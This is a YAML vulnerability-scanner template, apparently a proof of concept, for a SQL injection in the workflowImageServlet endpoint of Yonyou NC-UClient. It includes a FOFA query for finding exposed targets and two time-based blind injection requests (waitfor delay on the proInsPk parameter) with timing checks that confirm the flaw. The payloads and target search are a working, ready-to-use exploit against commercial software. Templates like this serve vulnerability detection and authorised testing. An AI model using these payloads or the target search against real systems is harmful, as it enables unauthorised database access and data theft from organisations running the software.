product: 用友NC-UClient
vName: 用友NC-UClient workflowImageServlet接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友NClient系统存在SQL注入漏洞，攻击者可利用 /*/workflowImageServlet/doPost 接口中的wfpk参数实现SQL注入，从而获取数据库内全部数据。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://github.com/wy876/POC/blob/main/用友OA/用友NC-workflowImageServlet接口存在sql注入漏洞.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:5'--
      header:
        Content-Type: application/x-www-form-urlencoded
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:0'--
      header:
        Content-Type: application/x-www-form-urlencoded
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3